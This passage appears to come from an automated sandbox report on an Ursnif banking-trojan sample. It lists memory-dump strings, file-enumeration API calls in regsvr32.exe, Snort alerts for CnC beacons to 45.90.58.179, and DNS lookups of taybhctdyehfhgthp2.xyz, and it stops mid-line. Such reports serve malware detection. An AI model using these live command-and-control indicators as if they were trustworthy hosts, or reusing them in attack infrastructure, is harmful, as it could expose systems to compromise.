            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002C.00000002.886760710.0000026782F50000.00000002.00000001.sdmp, csc.exe, 00000036.00000002.914710159.00000138B0E20000.00000002.00000001.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbXP* source: powershell.exe, 0000002F.00000002.962874378.00000251AFDE2000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdb source: powershell.exe, 0000002F.00000002.962727249.00000251AFD82000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbl\ModuleAnalysisCache.0.0.0__31bf3856ad364e35\System.Management.Automation.dllmands.Utility.dllt.dll source: powershell.exe, 0000002F.00000002.935651242.00000251AA29E000.00000004.00000020.sdmp
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0462FEC2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_0462FEC2
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04639F9E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_04639F9E
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0462F8CE wsprintfA,lstrlenW,WriteFile,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_0462F8CE
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0462FD33 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,3_2_0462FD33

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49782 -> 40.97.116.82:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49866 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49868 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49868 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49878 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49878 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49880 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49880 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49882 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49884 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49886 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49888 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49893 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49893 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49894 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49894 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49896 -> 45.90.58.179:80
            Performs DNS queries to domains with low reputationShow sources
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: DNS query: taybhctdyehfhgthp2.xyz
            Source: C:\Program Files (x8